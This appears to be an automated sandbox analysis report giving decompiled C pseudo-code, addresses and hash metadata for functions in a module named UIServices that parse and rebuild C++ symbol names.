                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 87%
                                                    			E00007FFC7FFC23C6BC80(void* __edi, long long __rbx, long long* __rcx, long long __rdi, long long __rsi, void* __r10, void* __r11, void* __r12) {
                                                    				void* __r14;
                                                    				intOrPtr _t148;
                                                    				void* _t149;
                                                    				void* _t166;
                                                    				void* _t167;
                                                    				void* _t170;
                                                    				void* _t184;
                                                    				signed char* _t185;
                                                    				char* _t188;
                                                    				intOrPtr _t189;
                                                    				intOrPtr* _t190;
                                                    				intOrPtr* _t192;
                                                    				char* _t193;
                                                    				intOrPtr* _t196;
                                                    				char* _t197;
                                                    				long long _t201;
                                                    				intOrPtr* _t233;
                                                    				char* _t244;
                                                    				void* _t245;
                                                    				void* _t249;
                                                    				void* _t251;
                                                    				void* _t259;
                                                    				long long* _t265;
                                                    				void* _t270;
                                                    				void* _t272;
                                                    				void* _t273;
                                                    				void* _t291;
                                                    				long long _t292;
                                                    				long long _t294;
                                                    
                                                    				_t290 = __r12;
                                                    				_t288 = __r11;
                                                    				_t267 = __rsi;
                                                    				_t200 = __rbx;
                                                    				_t184 = _t272;
                                                    				 *((long long*)(_t184 + 8)) = __rbx;
                                                    				 *((long long*)(_t184 + 0x10)) = __rsi;
                                                    				 *((long long*)(_t184 + 0x18)) = __rdi;
                                                    				_t270 = _t184 - 0x158;
                                                    				_t273 = _t272 - 0x240;
                                                    				r14d = 0;
                                                    				_t292 = "::";
                                                    				 *__rcx = _t294;
                                                    				sil = r14b;
                                                    				 *((intOrPtr*)(__rcx + 8)) = r14d;
                                                    				_t265 = __rcx;
                                                    				_t185 =  *0x23c74360; // 0x0
                                                    				if (( *_t185 & 0x000000bf) == 0) goto 0x23c6c08e;
                                                    				_t166 =  *0x23c74374 - r14b; // 0x0
                                                    				if (_t166 == 0) goto 0x23c6bcdf;
                                                    				_t167 =  *0x23c74375 - r14b; // 0x0
                                                    				if (_t167 == 0) goto 0x23c6c113;
                                                    				if ( *((intOrPtr*)(__rcx)) == _t294) goto 0x23c6bd5f;
                                                    				 *((long long*)(_t270 - 0x60)) = _t292;
                                                    				 *((intOrPtr*)(_t270 - 0x58)) = 2;
                                                    				asm("movaps xmm0, [ebp-0x60]");
                                                    				asm("movdqa [esp+0x40], xmm0");
                                                    				E00007FFC7FFC23C66CF4(_t185, _t270 + 0x30, _t273 + 0x40);
                                                    				E00007FFC7FFC23C66F74(_t185, _t270 - 0x50, __rcx);
                                                    				 *_t265 =  *((intOrPtr*)(_t270 - 0x50));
                                                    				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t270 - 0x48));
                                                    				if (sil == 0) goto 0x23c6bd5f;
                                                    				 *((long long*)(_t273 + 0x50)) = _t294;
                                                    				 *((intOrPtr*)(_t273 + 0x58)) = r14d;
                                                    				E00007FFC7FFC23C68150(0x5b,  *((intOrPtr*)(_t270 - 0x50)), __rbx, _t273 + 0x50);
                                                    				E00007FFC7FFC23C66F74(_t273 + 0x50, _t270 - 0x40, _t265);
                                                    				sil = r14b;
                                                    				 *_t265 =  *((intOrPtr*)(_t270 - 0x40));
                                                    				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t270 - 0x38));
                                                    				_t188 =  *0x23c74360; // 0x0
                                                    				_t170 =  *_t188 - 0x3f;
                                                    				if (_t170 != 0) goto 0x23c6c05b;
                                                    				_t24 = _t188 + 1; // 0x1
                                                    				_t244 = _t24;
                                                    				 *0x23c74360 = _t244;
                                                    				if (_t170 == 0) goto 0x23c6c036;
                                                    				if (_t170 == 0) goto 0x23c6bfc0;
                                                    				if (_t170 == 0) goto 0x23c6bf0d;
                                                    				if (_t170 == 0) goto 0x23c6bfc0;
                                                    				if (_t170 == 0) goto 0x23c6bec8;
                                                    				if ( *_t244 - 0xffffffffffffffff == 8) goto 0x23c6bdc4;
                                                    				E00007FFC7FFC23C6AA14( *_t244 - 0xffffffffffffffff - 8, _t188, _t200, _t270 + 0x40, _t244, __rsi, _t265, __r10, __r11, _t294);
                                                    				_t245 = _t270 + 0x130;
                                                    				goto 0x23c6c06d;
                                                    				_t201 = _t294;
                                                    				 *((intOrPtr*)(_t273 + 0x28)) = r14d;
                                                    				_t28 = _t245 + 1; // 0x2
                                                    				_t189 = _t28;
                                                    				 *((long long*)(_t273 + 0x20)) = _t201;
                                                    				 *0x23c74360 = _t189;
                                                    				r8d = 0;
                                                    				E00007FFC7FFC23C6DA5C(_t149,  *_t244 - 0xffffffffffffffff, 1, __edi, _t201, _t273 + 0x60, _t265, __rsi, _t265, __r10, __r11);
                                                    				if ( *((intOrPtr*)(_t273 + 0x68)) != 0) goto 0x23c6be47;
                                                    				if (_t201 == 0) goto 0x23c6be40;
                                                    				 *((long long*)(_t270 - 0x30)) = _t292;
                                                    				 *((intOrPtr*)(_t270 - 0x28)) = 2;
                                                    				asm("movaps xmm0, [ebp-0x30]");
                                                    				asm("movdqa [esp+0x40], xmm0");
                                                    				E00007FFC7FFC23C66F48(_t273 + 0x60, _t270 + 0x120, _t273 + 0x40);
                                                    				E00007FFC7FFC23C66F74(_t189, _t270 + 0x50, _t273 + 0x20);
                                                    				 *((intOrPtr*)(_t273 + 0x28)) =  *((intOrPtr*)(_t189 + 8));
                                                    				goto 0x23c6be52;
                                                    				goto 0x23c6be3a;
                                                    				 *((intOrPtr*)(_t273 + 0x28)) = 2;
                                                    				 *((long long*)(_t273 + 0x20)) = _t294;
                                                    				if ( *((intOrPtr*)(_t273 + 0x28)) != r14b) goto 0x23c6beb8;
                                                    				_t190 =  *0x23c74360; // 0x0
                                                    				if ( *_t190 != 0x40) goto 0x23c6bddc;
                                                    				 *((long long*)(_t273 + 0x70)) = _t294;
                                                    				 *((intOrPtr*)(_t273 + 0x78)) = r14d;
                                                    				E00007FFC7FFC23C68150(0x5b, _t190, _t294, _t273 + 0x70);
                                                    				E00007FFC7FFC23C66F74(_t273 + 0x70, _t270 - 0x10, _t273 + 0x20);
                                                    				r8b = 0x5d;
                                                    				_t249 = _t270 + 0x60;
                                                    				E00007FFC7FFC23C66FA0(_t270 - 0x10, _t249);
                                                    				 *_t265 =  *_t190;
                                                    				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t190 + 8));
                                                    				goto 0x23c6bf63;
                                                    				 *((intOrPtr*)(_t265 + 8)) = r14d;
                                                    				 *((char*)(_t265 + 8)) = 2;
                                                    				 *_t265 = _t294;
                                                    				goto 0x23c6c084;
                                                    				_t57 = _t249 + 1; // 0x2
                                                    				r8d = 0;
                                                    				 *0x23c74360 = _t57;
                                                    				E00007FFC7FFC23C6DA5C(_t149,  *_t244 - 0xffffffffffffffff, 1, __edi, _t294, _t270 + 0x70, _t265, _t267, _t273 + 0x20, __r10, __r11);
                                                    				r8b = 0x5d;
                                                    				E00007FFC7FFC23C66FA0(_t57, _t270 + 0x80);
                                                    				_t251 = _t270 + 0x90;
                                                    				E00007FFC7FFC23C66F74(_t57, _t251, _t265);
                                                    				sil = 1;
                                                    				goto 0x23c6c078;
                                                    				if ( *((char*)(_t251 + 1)) != 0x5f) goto 0x23c6bf6f;
                                                    				if ( *((char*)(_t251 + 2)) != 0x3f) goto 0x23c6bf6f;
                                                    				_t63 = _t251 + 1; // 0x2
                                                    				_t192 = _t63;
                                                    				r8d = 0;
                                                    				 *0x23c74360 = _t192;
                                                    				E00007FFC7FFC23C6ABE0(0, __edi, _t294, _t270 + 0xa0, _t265, _t267, _t265, __r12);
                                                    				E00007FFC7FFC23C66F74(_t192, _t270 + 0xb0, _t265);
                                                    				 *_t265 =  *_t192;
                                                    				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t192 + 8));
                                                    				_t193 =  *0x23c74360; // 0x0
                                                    				if ( *_t193 != 0x40) goto 0x23c6c084;
                                                    				 *0x23c74360 =  *0x23c74360 + 1;
                                                    				goto 0x23c6c084;
                                                    				E00007FFC7FFC23C698C8(__edi,  *_t193 - 0x40, _t193, _t294, _t270 + 0xc0, _t270 + 0xb0, _t265, _t267, _t265, _t290, _t294);
                                                    				 *((long long*)(_t270 - 0x80)) = _t294;
                                                    				 *((intOrPtr*)(_t270 - 0x78)) = r14d;
                                                    				E00007FFC7FFC23C68150(0x60, _t193, _t193, _t270 - 0x80);
                                                    				E00007FFC7FFC23C66F74(_t270 - 0x80, _t270, _t193);
                                                    				r8b = 0x27;
                                                    				E00007FFC7FFC23C66FA0(_t270, _t270 + 0xd0);
                                                    				goto 0x23c6c06d;
                                                    				r8b = 0x40;
                                                    				E00007FFC7FFC23C66C44(_t193, _t193, _t270 - 0x70, 0x23c74360, _t267, _t291);
                                                    				 *((intOrPtr*)(_t270 - 0x18)) = 0x15;
                                                    				 *((long long*)(_t270 - 0x20)) = "`anonymous namespace\'";
                                                    				asm("movaps xmm0, [ebp-0x20]");
                                                    				asm("movdqa [esp+0x40], xmm0");
                                                    				E00007FFC7FFC23C66CF4("`anonymous namespace\'", _t270 + 0xf0, _t273 + 0x40);
                                                    				E00007FFC7FFC23C66F74("`anonymous namespace\'", _t273 + 0x30, _t265);
                                                    				 *_t265 =  *((intOrPtr*)(_t273 + 0x30));
                                                    				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t273 + 0x38));
                                                    				_t233 =  *0x23c74350; // 0x0
                                                    				if ( *_t233 == 9) goto 0x23c6c084;
                                                    				_t259 = _t270 - 0x70;
                                                    				E00007FFC7FFC23C67204( *((intOrPtr*)(_t273 + 0x30)), _t193, _t233, _t259);
                                                    				goto 0x23c6c084;
                                                    				_t85 = _t259 - 1; // 0x0
                                                    				_t196 = _t85;
                                                    				r8d = 0;
                                                    				 *0x23c74360 = _t196;
                                                    				E00007FFC7FFC23C6DA5C(_t149,  *_t244 - 0xffffffffffffffff, 1, __edi, _t193, _t270 + 0x100, _t265, _t267, _t265, __r10, _t288);
                                                    				goto 0x23c6c06d;
                                                    				r8d = 0;
                                                    				E00007FFC7FFC23C6DA5C(_t149,  *_t244 - 0xffffffffffffffff, 1, __edi, _t193, _t270 + 0x20, _t265, _t267, _t265, __r10, _t288);
                                                    				E00007FFC7FFC23C66F74(_t196, _t270 + 0x10, _t265);
                                                    				 *_t265 =  *_t196;
                                                    				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t196 + 8));
                                                    				if ( *((intOrPtr*)(_t265 + 8)) == r14b) goto 0x23c6bcb9;
                                                    				_t197 =  *0x23c74360; // 0x0
                                                    				if ( *_t197 == r14b) goto 0x23c6c0ac;
                                                    				if ( *_t197 == 0x40) goto 0x23c6c113;
                                                    				 *((intOrPtr*)(_t265 + 8)) = r14d;
                                                    				 *((char*)(_t265 + 8)) = 2;
                                                    				 *_t265 = _t294;
                                                    				goto 0x23c6c113;
                                                    				if ( *_t265 != _t294) goto 0x23c6c0c5;
                                                    				 *((intOrPtr*)(_t265 + 8)) = r14d;
                                                    				 *((char*)(_t265 + 8)) = 1;
                                                    				 *_t265 = 0x23c71ac0;
                                                    				goto 0x23c6c113;
                                                    				 *((long long*)(_t273 + 0x30)) = _t292;
                                                    				 *((intOrPtr*)(_t273 + 0x38)) = 2;
                                                    				asm("movaps xmm0, [esp+0x30]");
                                                    				asm("movdqa [ebp-0x70], xmm0");
                                                    				 *((intOrPtr*)(_t273 + 0x38)) = r14d;
                                                    				 *((long long*)(_t273 + 0x30)) = 0x23c71ac0;
                                                    				E00007FFC7FFC23C66F48(_t273 + 0x30, _t270 + 0x10, _t270 - 0x70);
                                                    				E00007FFC7FFC23C66F74(0x23c71ac0, _t270 + 0x20, _t265);
                                                    				 *_t265 =  *0x23c71ac0;
                                                    				_t148 =  *0x7FFC23C71AC8;
                                                    				 *((intOrPtr*)(_t265 + 8)) = _t148;
                                                    				return _t148;
                                                    			}
































                                                    0x7ffc23c6bc80
                                                    0x7ffc23c6bc80
                                                    0x7ffc23c6bc80
                                                    0x7ffc23c6bc80
                                                    0x7ffc23c6bc80
                                                    0x7ffc23c6bc83
                                                    0x7ffc23c6bc87
                                                    0x7ffc23c6bc8b
                                                    0x7ffc23c6bc94
                                                    0x7ffc23c6bc9b
                                                    0x7ffc23c6bca2
                                                    0x7ffc23c6bca5
                                                    0x7ffc23c6bcac
                                                    0x7ffc23c6bcaf
                                                    0x7ffc23c6bcb2
                                                    0x7ffc23c6bcb6
                                                    0x7ffc23c6bcb9
                                                    0x7ffc23c6bcc3
                                                    0x7ffc23c6bcc9
                                                    0x7ffc23c6bcd0
                                                    0x7ffc23c6bcd2
                                                    0x7ffc23c6bcd9
                                                    0x7ffc23c6bce2
                                                    0x7ffc23c6bce4
                                                    0x7ffc23c6bced
                                                    0x7ffc23c6bcf8
                                                    0x7ffc23c6bcfc
                                                    0x7ffc23c6bd02
                                                    0x7ffc23c6bd11
                                                    0x7ffc23c6bd1a
                                                    0x7ffc23c6bd20
                                                    0x7ffc23c6bd26
                                                    0x7ffc23c6bd2a
                                                    0x7ffc23c6bd34
                                                    0x7ffc23c6bd39
                                                    0x7ffc23c6bd4a
                                                    0x7ffc23c6bd53
                                                    0x7ffc23c6bd56
                                                    0x7ffc23c6bd5c
                                                    0x7ffc23c6bd5f
                                                    0x7ffc23c6bd66
                                                    0x7ffc23c6bd69
                                                    0x7ffc23c6bd6f
                                                    0x7ffc23c6bd6f
                                                    0x7ffc23c6bd73
                                                    0x7ffc23c6bd80
                                                    0x7ffc23c6bd89
                                                    0x7ffc23c6bd92
                                                    0x7ffc23c6bd9b
                                                    0x7ffc23c6bda4
                                                    0x7ffc23c6bdad
                                                    0x7ffc23c6bdb3
                                                    0x7ffc23c6bdb8
                                                    0x7ffc23c6bdbf
                                                    0x7ffc23c6bdc4
                                                    0x7ffc23c6bdc7
                                                    0x7ffc23c6bdcc
                                                    0x7ffc23c6bdcc
                                                    0x7ffc23c6bdd0
                                                    0x7ffc23c6bdd5
                                                    0x7ffc23c6bddc
                                                    0x7ffc23c6bde6
                                                    0x7ffc23c6bdf1
                                                    0x7ffc23c6bdf6
                                                    0x7ffc23c6bdf8
                                                    0x7ffc23c6be01
                                                    0x7ffc23c6be0f
                                                    0x7ffc23c6be18
                                                    0x7ffc23c6be1e
                                                    0x7ffc23c6be2f
                                                    0x7ffc23c6be3a
                                                    0x7ffc23c6be3e
                                                    0x7ffc23c6be45
                                                    0x7ffc23c6be47
                                                    0x7ffc23c6be52
                                                    0x7ffc23c6be5c
                                                    0x7ffc23c6be5e
                                                    0x7ffc23c6be68
                                                    0x7ffc23c6be70
                                                    0x7ffc23c6be7a
                                                    0x7ffc23c6be7f
                                                    0x7ffc23c6be92
                                                    0x7ffc23c6be97
                                                    0x7ffc23c6be9a
                                                    0x7ffc23c6bea2
                                                    0x7ffc23c6beaa
                                                    0x7ffc23c6beb0
                                                    0x7ffc23c6beb3
                                                    0x7ffc23c6beb8
                                                    0x7ffc23c6bebc
                                                    0x7ffc23c6bec0
                                                    0x7ffc23c6bec3
                                                    0x7ffc23c6bec8
                                                    0x7ffc23c6becc
                                                    0x7ffc23c6bed1
                                                    0x7ffc23c6bedc
                                                    0x7ffc23c6bee1
                                                    0x7ffc23c6beee
                                                    0x7ffc23c6bef6
                                                    0x7ffc23c6bf00
                                                    0x7ffc23c6bf05
                                                    0x7ffc23c6bf08
                                                    0x7ffc23c6bf11
                                                    0x7ffc23c6bf17
                                                    0x7ffc23c6bf19
                                                    0x7ffc23c6bf19
                                                    0x7ffc23c6bf1d
                                                    0x7ffc23c6bf22
                                                    0x7ffc23c6bf30
                                                    0x7ffc23c6bf42
                                                    0x7ffc23c6bf4a
                                                    0x7ffc23c6bf50
                                                    0x7ffc23c6bf53
                                                    0x7ffc23c6bf5d
                                                    0x7ffc23c6bf63
                                                    0x7ffc23c6bf6a
                                                    0x7ffc23c6bf76
                                                    0x7ffc23c6bf7d
                                                    0x7ffc23c6bf85
                                                    0x7ffc23c6bf8c
                                                    0x7ffc23c6bf9c
                                                    0x7ffc23c6bfa1
                                                    0x7ffc23c6bfaf
                                                    0x7ffc23c6bfbb
                                                    0x7ffc23c6bfc0
                                                    0x7ffc23c6bfce
                                                    0x7ffc23c6bfda
                                                    0x7ffc23c6bfe1
                                                    0x7ffc23c6bfea
                                                    0x7ffc23c6bff5
                                                    0x7ffc23c6bffb
                                                    0x7ffc23c6c00b
                                                    0x7ffc23c6c015
                                                    0x7ffc23c6c01c
                                                    0x7ffc23c6c01f
                                                    0x7ffc23c6c029
                                                    0x7ffc23c6c02b
                                                    0x7ffc23c6c02f
                                                    0x7ffc23c6c034
                                                    0x7ffc23c6c036
                                                    0x7ffc23c6c036
                                                    0x7ffc23c6c03a
                                                    0x7ffc23c6c03f
                                                    0x7ffc23c6c04d
                                                    0x7ffc23c6c059
                                                    0x7ffc23c6c05b
                                                    0x7ffc23c6c064
                                                    0x7ffc23c6c073
                                                    0x7ffc23c6c07b
                                                    0x7ffc23c6c081
                                                    0x7ffc23c6c088
                                                    0x7ffc23c6c08e
                                                    0x7ffc23c6c098
                                                    0x7ffc23c6c09d
                                                    0x7ffc23c6c09f
                                                    0x7ffc23c6c0a3
                                                    0x7ffc23c6c0a7
                                                    0x7ffc23c6c0aa
                                                    0x7ffc23c6c0b6
                                                    0x7ffc23c6c0b8
                                                    0x7ffc23c6c0bc
                                                    0x7ffc23c6c0c0
                                                    0x7ffc23c6c0c3
                                                    0x7ffc23c6c0c5
                                                    0x7ffc23c6c0ce
                                                    0x7ffc23c6c0da
                                                    0x7ffc23c6c0e4
                                                    0x7ffc23c6c0e9
                                                    0x7ffc23c6c0ee
                                                    0x7ffc23c6c0f3
                                                    0x7ffc23c6c102
                                                    0x7ffc23c6c10a
                                                    0x7ffc23c6c10d
                                                    0x7ffc23c6c110
                                                    0x7ffc23c6c132

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: `anonymous namespace'
                                                    • API String ID: 2943138195-3062148218
                                                    • Opcode ID: ace1387cadf23985a6da4a59c4affd8786d881318c5283d2d6dca3bb4ae1bec8
                                                    • Instruction ID: b8e5fc947e6c25810b31cadf710b46221956051e91f99fc8d2a69ff4b1c230aa
                                                    • Opcode Fuzzy Hash: ace1387cadf23985a6da4a59c4affd8786d881318c5283d2d6dca3bb4ae1bec8
                                                    • Instruction Fuzzy Hash: 69E19F72A08B9A95EB10DF69EC801AC77B4FB84784F808275EB4D27B55DF38E554CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 88%
                                                    			E00007FFC7FFC23C6A434(void* __ecx, void* __edi, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi) {
                                                    				void* __r12;
                                                    				signed int _t169;
                                                    				unsigned int _t173;
                                                    				unsigned int _t184;
                                                    				unsigned int _t212;
                                                    				signed int _t225;
                                                    				void* _t228;
                                                    				signed int _t229;
                                                    				unsigned int _t230;
                                                    				signed int _t250;
                                                    				void* _t259;
                                                    				void* _t285;
                                                    				intOrPtr* _t289;
                                                    				char* _t292;
                                                    				long long* _t294;
                                                    				long long _t296;
                                                    				intOrPtr* _t304;
                                                    				char* _t305;
                                                    				char* _t306;
                                                    				char* _t347;
                                                    				void* _t353;
                                                    				long long* _t370;
                                                    				long long* _t374;
                                                    				void* _t376;
                                                    				void* _t377;
                                                    				void* _t379;
                                                    				void* _t395;
                                                    				void* _t396;
                                                    				void* _t398;
                                                    				long long _t400;
                                                    				void* _t402;
                                                    				void* _t406;
                                                    				intOrPtr* _t407;
                                                    
                                                    				_t372 = __rsi;
                                                    				_t245 = __edi;
                                                    				_t228 = __ecx;
                                                    				_t285 = _t379;
                                                    				 *((long long*)(_t285 + 8)) = __rbx;
                                                    				 *((long long*)(_t285 + 0x10)) = __rsi;
                                                    				 *((long long*)(_t285 + 0x18)) = __rdi;
                                                    				_t377 = _t285 - 0x5f;
                                                    				_t370 = __rcx;
                                                    				r13d = 0;
                                                    				_t304 =  *0x23c74360; // 0x0
                                                    				_t407 = __rdx;
                                                    				if ( *_t304 != r13b) goto 0x23c6a48f;
                                                    				 *(_t377 - 0x11) = r13d;
                                                    				 *((long long*)(_t377 - 0x19)) = 0x23c71ac0;
                                                    				_t305 = _t377 - 0x19;
                                                    				E00007FFC7FFC23C66F74(_t305, __rcx, __rdx);
                                                    				goto 0x23c6a945;
                                                    				if ( *_t305 - 0x36 - 3 <= 0) goto 0x23c6a4a0;
                                                    				if ( *_t305 != 0x5f) goto 0x23c6a93a;
                                                    				r8d = r8d | 0xffffffff;
                                                    				_t306 = _t305 + 1;
                                                    				 *0x23c74360 = _t306;
                                                    				if ( *_t305 - 0x36 != 0x29) goto 0x23c6a4de;
                                                    				if ( *_t306 == r13b) goto 0x23c6a46c;
                                                    				_t8 = _t306 + 1; // 0x2
                                                    				_t347 = _t8;
                                                    				 *0x23c74360 = _t347;
                                                    				_t250 =  >  ? r8d :  *_t306 - 0x3d;
                                                    				goto 0x23c6a4f2;
                                                    				if (_t250 < 0) goto 0x23c6a93a;
                                                    				if (_t250 - 3 > 0) goto 0x23c6a93a;
                                                    				_t259 = _t250 - r8d;
                                                    				if (_t259 == 0) goto 0x23c6a93a;
                                                    				r12d = _t250;
                                                    				 *((long long*)(_t377 - 0x29)) = _t400;
                                                    				 *(_t377 - 0x21) = r13d;
                                                    				 *((long long*)(_t377 - 0x39)) =  *_t407;
                                                    				 *(_t377 - 0x31) =  *(_t407 + 8);
                                                    				r12d = r12d & 0x00000002;
                                                    				if (_t259 == 0) goto 0x23c6a66e;
                                                    				if ( *_t347 == 0x40) goto 0x23c6a5fc;
                                                    				 *(_t377 - 0x11) = 2;
                                                    				 *((long long*)(_t377 - 0x19)) = "::";
                                                    				asm("movaps xmm0, [ebp-0x19]");
                                                    				asm("movdqa [ebp+0x7], xmm0");
                                                    				E00007FFC7FFC23C66CF4("::", _t377 - 9, _t377 + 7);
                                                    				E00007FFC7FFC23C66F74("::", _t377 - 0x19, _t377 - 0x39);
                                                    				 *((long long*)(_t377 - 0x39)) =  *((intOrPtr*)(_t377 - 0x19));
                                                    				 *(_t377 - 0x31) =  *(_t377 - 0x11);
                                                    				_t289 =  *0x23c74360; // 0x0
                                                    				if ( *_t289 == r13b) goto 0x23c6a5cc;
                                                    				E00007FFC7FFC23C6BC80(__edi, __rbx, _t377 - 9, _t370, __rsi, _t395, _t396, _t398);
                                                    				 *((long long*)(_t377 - 0x19)) = _t400;
                                                    				 *(_t377 - 0x11) = r13d;
                                                    				E00007FFC7FFC23C68150(0x20, _t289, _t289, _t377 - 0x19);
                                                    				E00007FFC7FFC23C66F74(_t377 - 0x19, _t377 + 7, _t289);
                                                    				E00007FFC7FFC23C66F74(_t377 + 7, _t377 + 0x27, _t377 - 0x39);
                                                    				 *((long long*)(_t377 - 0x39)) =  *_t289;
                                                    				goto 0x23c6a5f0;
                                                    				 *(_t377 - 0x11) = r13d;
                                                    				_t353 = _t377 - 9;
                                                    				 *((long long*)(_t377 - 0x19)) = 0x23c71ac0;
                                                    				E00007FFC7FFC23C66F74(_t377 - 0x19, _t353, _t377 - 0x39);
                                                    				 *((long long*)(_t377 - 0x39)) =  *((intOrPtr*)(_t377 - 9));
                                                    				 *(_t377 - 0x31) =  *(_t377 - 1);
                                                    				goto 0x23c6a607;
                                                    				_t45 = _t353 + 1; // 0x2
                                                    				_t292 = _t45;
                                                    				 *0x23c74360 = _t292;
                                                    				if ( *_t292 == r13b) goto 0x23c6a708;
                                                    				if ( *_t292 != 0x40) goto 0x23c6a93a;
                                                    				 *((long long*)(_t377 - 9)) = _t400;
                                                    				 *0x23c74360 = _t292 + 1;
                                                    				r8d = 0;
                                                    				_t169 =  *0x23c74370; // 0x0
                                                    				 *(_t377 - 1) = r13d;
                                                    				 *((intOrPtr*)(_t379 - 0xa0 + 0x20)) = 1;
                                                    				if ((_t169 & 0x00000060) == 0x60) goto 0x23c6a6dc;
                                                    				 *((long long*)(_t377 - 0x19)) = _t400;
                                                    				 *(_t377 - 0x11) = r13d;
                                                    				E00007FFC7FFC23C68F1C(__edi, _t289, _t377 + 7, _t377 - 0x19, _t370, _t372, _t377 - 9);
                                                    				_t294 =  *((intOrPtr*)(_t377 + 7));
                                                    				 *((long long*)(_t377 - 0x29)) = _t294;
                                                    				 *(_t377 - 0x21) =  *(_t377 + 0xf);
                                                    				r14d = 0xffffff00;
                                                    				if ((sil & 0x00000004) == 0) goto 0x23c6a73a;
                                                    				_t173 =  *0x23c74370; // 0x0
                                                    				if (( !(_t173 >> 1) & 0x00000001) == 0) goto 0x23c6a71d;
                                                    				E00007FFC7FFC23C687A0(_t228, __edi,  !(_t173 >> 1) & 0x00000001, _t294, _t289, _t377 + 0x27, _t372, _t377 - 0x39, _t406);
                                                    				 *((long long*)(_t377 - 0x19)) = _t400;
                                                    				 *(_t377 - 0x11) = r13d;
                                                    				_t300 = _t294;
                                                    				E00007FFC7FFC23C68150(0x20, _t294, _t294, _t377 - 0x19);
                                                    				E00007FFC7FFC23C66F74(_t377 - 0x19, _t377 + 7, _t294);
                                                    				E00007FFC7FFC23C66F74(_t377 + 7, _t377 - 9, _t377 - 0x39);
                                                    				 *((long long*)(_t377 - 0x39)) =  *_t294;
                                                    				goto 0x23c6a737;
                                                    				 *((long long*)(_t377 + 7)) = _t400;
                                                    				 *(_t377 + 0xf) = r13d;
                                                    				E00007FFC7FFC23C68F1C(__edi, _t294, _t377 - 0x19, _t377 - 9, _t370, _t372, _t377 + 7);
                                                    				if ( *(_t377 - 0x11) - 1 <= 0) goto 0x23c6a66e;
                                                    				goto 0x23c6a66b;
                                                    				 *(_t377 + 0xf) = r13d;
                                                    				 *((long long*)(_t377 + 7)) = 0x23c71ac0;
                                                    				goto 0x23c6a482;
                                                    				E00007FFC7FFC23C687A0(_t228, __edi,  *(_t377 - 0x11) - 1, _t294, _t294, _t377 + 7, _t372, _t377 - 0x39, _t402);
                                                    				if ( *(_t377 - 0x31) == 3) goto 0x23c6a73a;
                                                    				if ( *(_t294 + 8) - 1 <= 0) goto 0x23c6a73a;
                                                    				_t225 =  *(_t294 + 8) & r14d |  *(_t294 + 8) & 0x000000ff;
                                                    				 *(_t377 - 0x31) = _t225;
                                                    				_t184 =  *0x23c74370; // 0x0
                                                    				if (( !(_t184 >> 1) & 0x00000001) == 0) goto 0x23c6a770;
                                                    				E00007FFC7FFC23C68DDC(_t294, _t377 + 0x27, _t370, _t372, _t400, _t398);
                                                    				E00007FFC7FFC23C66F74(_t294, _t377 + 7, _t377 - 0x39);
                                                    				 *((long long*)(_t377 - 0x39)) =  *_t294;
                                                    				 *(_t377 - 0x31) =  *(_t294 + 8);
                                                    				goto 0x23c6a78d;
                                                    				E00007FFC7FFC23C68DDC(_t294,  *_t294, _t370, _t372);
                                                    				if ( *(_t377 - 0x31) == 3) goto 0x23c6a78d;
                                                    				if ( *(_t294 + 8) - 1 <= 0) goto 0x23c6a78d;
                                                    				 *(_t377 - 0x31) = _t225 & r14d |  *(_t294 + 8) & 0x000000ff;
                                                    				if ( *_t407 == _t400) goto 0x23c6a7d3;
                                                    				 *((long long*)(_t377 - 0x19)) = _t400;
                                                    				 *(_t377 - 0x11) = r13d;
                                                    				E00007FFC7FFC23C68150(0x28, _t294, _t300, _t377 - 0x19);
                                                    				E00007FFC7FFC23C66F74(_t377 - 0x19, _t377 + 7, _t377 - 0x39);
                                                    				r8b = 0x29;
                                                    				E00007FFC7FFC23C66FA0(_t377 + 7, _t377 + 0x27);
                                                    				 *((long long*)(_t377 - 0x39)) =  *_t294;
                                                    				 *(_t377 - 0x31) =  *(_t294 + 8);
                                                    				E00007FFC7FFC23C6AA78(_t294, _t300, 0x23c74388, _t377 + 0x27, _t372, _t376);
                                                    				if (_t294 == 0) goto 0x23c6a7f5;
                                                    				 *_t294 = _t400;
                                                    				 *(_t294 + 8) = r13d;
                                                    				goto 0x23c6a7f8;
                                                    				_t374 = _t400;
                                                    				E00007FFC7FFC23C6BC4C(_t245, _t377 + 0x17, _t370);
                                                    				E00007FFC7FFC23C68334(_t300, _t377 + 0x27, _t374, _t374, _t377 - 0x39);
                                                    				 *((long long*)(_t377 - 0x19)) = _t400;
                                                    				 *(_t377 - 0x11) = r13d;
                                                    				_t301 = _t294;
                                                    				E00007FFC7FFC23C68150(0x28, _t294, _t294, _t377 - 0x19);
                                                    				E00007FFC7FFC23C66F74(_t377 - 0x19, _t377 + 7, _t301);
                                                    				r8b = 0x29;
                                                    				E00007FFC7FFC23C66FA0(_t377 + 7, _t377 - 9);
                                                    				E00007FFC7FFC23C67078(_t228, _t377 - 0x39, _t294, _t301);
                                                    				_t229 =  *0x23c74370; // 0x0
                                                    				if ((_t229 & 0x00000060) == 0x60) goto 0x23c6a876;
                                                    				if (r12d == 0) goto 0x23c6a876;
